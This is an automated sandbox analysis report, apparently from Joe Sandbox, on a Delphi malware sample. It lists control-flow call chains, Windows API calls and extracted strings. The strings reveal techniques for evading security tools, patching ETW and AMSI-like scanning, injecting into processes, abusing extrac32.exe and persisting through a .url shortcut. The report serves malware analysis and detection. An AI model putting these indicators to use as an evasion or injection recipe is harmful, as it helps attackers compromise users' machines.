call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28048b0 1818->1862 1833 282007f-28200ea call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 1828->1833 1856 28200ef-2820113 call 2817be8 call 280e3b8 1833->1856 1867 2820118-2820186 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 1856->1867 1861->1862 1887 28216bd-2821847 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 call 2807e3c 1861->1887 2416 28253e0-282565b call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28048b0 1862->2416 2417 2823c19-2823c5e call 2804824 call 2804964 call 2804698 call 2807e18 1862->2417 1902 282018b-2820192 call 2817be8 1867->1902 2025 282184c-282184e 1887->2025 1908 2820197-2820202 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 1902->1908 1946 2820207-282021f call 2817be8 call 280e3b8 1908->1946 1956 2820224-2820292 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 1946->1956 1994 2820297-282029e call 2817be8 1956->1994 1998 28202a3-282030e call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 1994->1998 2035 2820313-2820330 call 2817be8 call 280e3b8 1998->2035 2025->1862 2028 2821854-2821ab8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2803694 call 2802f08 call 280794c call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28036c4 2025->2028 2046 2820335-28203b3 call 28117a4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 2035->2046 2090 28203b8-28203bf call 2817be8 2046->2090 2094 28203c4-282042f call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 2090->2094 2131 2820434-2820461 call 2817be8 CoUninitialize call 2804824 2094->2131 2141 2820466-28204b0 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 2131->2141 2172 28204b5-28204bc call 2817be8 2141->2172 2178 28204c1-282052c call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 2172->2178 2212 2820531-2820538 call 2817be8 2178->2212 2216 282053d-2820550 2212->2216 2218 2820552-2820555 2216->2218 2219 2820557-282055c 2216->2219 2218->2219 2219->1563 2221 2820562-282076d call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281d578 call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 2219->2221 2221->1563 2562 2826190-282638f call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28048b0 2416->2562 2563 2825661-2825815 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28047b0 call 2804964 WinExec 2416->2563 2417->2416 2435 2823c64-2824389 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 WinExec 2417->2435 3074 282438e-2824571 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28048b0 2435->3074 2741 2826b54-2826cd7 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28048b0 2562->2741 2742 2826395-2826823 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2802ee0 call 2802f08 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 GetCurrentProcess call 2817968 2562->2742 2704 282581a-2825cb3 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804964 call 2804698 call 2819e70 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2803694 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 2563->2704 3308 2825cb5-2825cb8 2704->3308 3309 2825cba-2825f7c call 2815aa8 call 2804b90 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28049bc RtlMoveMemory call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281a1c0 2704->3309 2921 28274a8-2828b96 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 * 16 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 ExitProcess 2741->2921 2922 2826cdd-2826cec call 28048b0 2741->2922 3358 2826828-28269b4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 2742->3358 2922->2921 2937 2826cf2-2826fc5 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281d198 call 2804824 call 2804964 call 2804698 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2807e18 2922->2937 3343 28272a2-28274a3 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28049bc call 2817f48 2937->3343 3344 2826fcb-282729d call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281c74c call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804da4 * 2 call 2804728 call 281c3f8 2937->3344 3374 2824577-28247d0 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804d38 call 2804da4 call 2804728 call 281c3f8 3074->3374 3375 28247d5-2824ef6 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2803694 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2802f08 call 280794c call 28047b0 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2802f08 call 280794c call 28047b0 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28036c4 3074->3375 3308->3309 3842 2825f81-2825f98 call 28036c4 3309->3842 3343->2921 3344->3343 3659 28269b6-28269b9 3358->3659 3660 28269bb-2826b4f call 28049bc call 281c5bc call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 EnumSystemLocalesA 3358->3660 3374->3375 3659->3660 3660->2741
                  APIs
                  • InetIsOffline.URL(00000000,00000000,02828FB6,?,?,?,00000000,00000000), ref: 0281D604
                    • Part of subcall function 02817BE8: LoadLibraryW.KERNEL32(?,00000000,02817C9A), ref: 02817C18
                    • Part of subcall function 02817BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02817C9A), ref: 02817C1E
                    • Part of subcall function 02817BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02817C37
                    • Part of subcall function 02807E18: GetFileAttributesA.KERNEL32(00000000,?,0281E0EE,ScanString,02864344,02828FEC,OpenSession,02864344,02828FEC,ScanString,02864344,02828FEC,UacScan,02864344,02828FEC,UacInitialize), ref: 02807E23
                    • Part of subcall function 0280C320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028645F0,?,0281E40F,ScanBuffer,02864344,02828FEC,OpenSession,02864344,02828FEC,ScanBuffer,02864344,02828FEC,OpenSession), ref: 0280C337
                    • Part of subcall function 0281C4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0281C5AC), ref: 0281C517
                    • Part of subcall function 0281C4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0281C5AC), ref: 0281C547
                    • Part of subcall function 0281C4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0281C55C
                    • Part of subcall function 0281C4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0281C588
                    • Part of subcall function 0281C4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0281C591
                    • Part of subcall function 02807E3C: GetFileAttributesA.KERNEL32(00000000,?,02821133,ScanString,02864344,02828FEC,OpenSession,02864344,02828FEC,OpenSession,02864344,02828FEC,ScanBuffer,02864344,02828FEC,ScanString), ref: 02807E47
                    • Part of subcall function 02808004: CreateDirectoryA.KERNEL32(00000000,00000000,?,02821324,ScanBuffer,02864344,02828FEC,OpenSession,02864344,02828FEC,Initialize,02864344,02828FEC,ScanString,02864344,02828FEC), ref: 02808011
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
                  • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tAh$tquery$wintrust
                  • API String ID: 2725267379-1919092029
                  • Opcode ID: 294cdab74aa96c9cd8115dc2eb0160f5b8256c93741409726dd592cefe397b88
                  • Instruction ID: db46773669d1041c896ec8e3c5fa86435afd0b5cb8516f449a2b5cf4867d2c19
                  • Opcode Fuzzy Hash: 294cdab74aa96c9cd8115dc2eb0160f5b8256c93741409726dd592cefe397b88
                  • Instruction Fuzzy Hash: AE04103CA811599FDB91EB68DCC0EDE73BAAF45300F5084A1E209E7690DB70AE85CF55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 4520 2805a90-2805ad1 GetModuleFileNameA RegOpenKeyExA 4521 2805b13-2805b56 call 28058cc RegQueryValueExA 4520->4521 4522 2805ad3-2805aef RegOpenKeyExA 4520->4522 4527 2805b58-2805b74 RegQueryValueExA 4521->4527 4528 2805b7a-2805b94 RegCloseKey 4521->4528 4522->4521 4523 2805af1-2805b0d RegOpenKeyExA 4522->4523 4523->4521 4525 2805b9c-2805bcd lstrcpynA GetThreadLocale GetLocaleInfoA 4523->4525 4529 2805bd3-2805bd7 4525->4529 4530 2805cb6-2805cbd 4525->4530 4527->4528 4531 2805b76 4527->4531 4533 2805be3-2805bf9 lstrlenA 4529->4533 4534 2805bd9-2805bdd 4529->4534 4531->4528 4535 2805bfc-2805bff 4533->4535 4534->4530 4534->4533 4536 2805c01-2805c09 4535->4536 4537 2805c0b-2805c13 4535->4537 4536->4537 4538 2805bfb 4536->4538 4537->4530 4539 2805c19-2805c1e 4537->4539 4538->4535 4540 2805c20-2805c46 lstrcpynA LoadLibraryExA 4539->4540 4541 2805c48-2805c4a 4539->4541 4540->4541 4541->4530 4542 2805c4c-2805c50 4541->4542 4542->4530 4543 2805c52-2805c82 lstrcpynA LoadLibraryExA 4542->4543 4543->4530 4544 2805c84-2805cb4 lstrcpynA LoadLibraryExA 4543->4544 4544->4530
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02800000,0282B790), ref: 02805AAC
                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02800000,0282B790), ref: 02805ACA
                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02800000,0282B790), ref: 02805AE8
                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02805B06
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02805B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02805B4F
                  • RegQueryValueExA.ADVAPI32(?,02805CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02805B95,?,80000001), ref: 02805B6D
                  • RegCloseKey.ADVAPI32(?,02805B9C,00000000,?,?,00000000,02805B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02805B8F
                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02805BAC
                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02805BB9
                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02805BBF
                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02805BEA
                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02805C31
                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02805C41
                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02805C69
                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02805C79
                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02805C9F
                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02805CAF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                  • API String ID: 1759228003-2375825460
                  • Opcode ID: e08a4011f692388f581b5ffc665760f7caae82dd0bdbdda1ba9b9ad2554e556f
                  • Instruction ID: 517ecf2c11d587d059006c19289aa313826ac14d7df91f19064852810986973f
                  • Opcode Fuzzy Hash: e08a4011f692388f581b5ffc665760f7caae82dd0bdbdda1ba9b9ad2554e556f
                  • Instruction Fuzzy Hash: E051547DA4020C7EFB65D6A8CC86FEF77AD9B08754F8001A1A608E61C1E7789A448F65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                    • Part of subcall function 02804EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02804EF2
                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0281C5AC), ref: 0281C517
                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0281C5AC), ref: 0281C547
                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0281C55C
                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0281C588
                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0281C591
                    • Part of subcall function 02804C24: SysFreeString.OLEAUT32(0281D42C), ref: 02804C32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                  • String ID:
                  • API String ID: 1897104825-0
                  • Opcode ID: 3c6c0f89ec0c267255c6ba00ae605c6271e7d390fc2b924ccb1aa04614ee3b44
                  • Instruction ID: bd8bc0f3dfa2d88a96b9aded02e13cfaa0da42f30e345350281dd2e3e9dd8f0f
                  • Opcode Fuzzy Hash: 3c6c0f89ec0c267255c6ba00ae605c6271e7d390fc2b924ccb1aa04614ee3b44
                  • Instruction Fuzzy Hash: D321957DA902087AEB51EAD8CC52FDEB7BDAB08700F500466B704E71C0D674B9458B55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
